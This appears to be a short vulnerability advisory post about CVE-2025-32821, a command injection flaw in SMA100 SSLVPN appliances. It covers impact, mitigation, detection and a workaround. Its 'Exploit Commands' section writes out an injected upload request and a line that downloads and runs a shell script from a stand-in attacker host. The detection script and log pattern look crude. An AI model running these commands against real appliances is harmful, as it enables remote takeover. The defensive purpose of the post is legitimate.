How the CVE Works

CVE-2025-32821 is a critical command injection vulnerability in SMA100 SSLVPN appliances. An authenticated attacker with admin privileges can exploit improper input sanitization in file upload functionality to inject malicious shell commands. The appliance processes these commands with elevated privileges, enabling arbitrary file uploads or remote code execution. The vulnerability stems from insufficient validation of user-supplied arguments in administrative SSLVPN requests, allowing attackers to bypass security controls and execute OS-level commands.

DailyCVE Form:

Platform: SMA100 SSLVPN
Version: Pre-10.2.5
Vulnerability: Command Injection
Severity: Critical
Date: 05/19/2025

What Undercode Say:

Analytics:

  • Exploitability: High (requires admin creds)
  • Attack Vector: Network
  • Impact: RCE, data theft

Exploit Commands:

  1. Craft malicious file upload request with embedded commands:
    curl -k -X POST "https://<TARGET>/upload" -F "[email protected];cmd=id" -H "Cookie: admin_token=VALID_TOKEN"

2. Trigger command execution via SSLVPN admin panel:

; /bin/bash -c 'curl ATTACKER_IP/shell.sh | bash'

Mitigation Steps:

1. Patch to SMA100 10.2.5+ immediately.

2. Restrict SSLVPN admin access via ACLs:

iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT

3. Audit logs for suspicious uploads:

grep -r "upload.;." /var/log/sma100/ssl_vpn.log

Detection Script:

import requests
def check_vuln(target):
resp = requests.post(f"{target}/upload", verify=False, files={"file": ("test", "test")})
return ";bin/sh" in resp.text

Workaround: Disable file uploads in SSLVPN config:

<ssl_vpn>
<file_upload enabled="false"/>
</ssl_vpn>
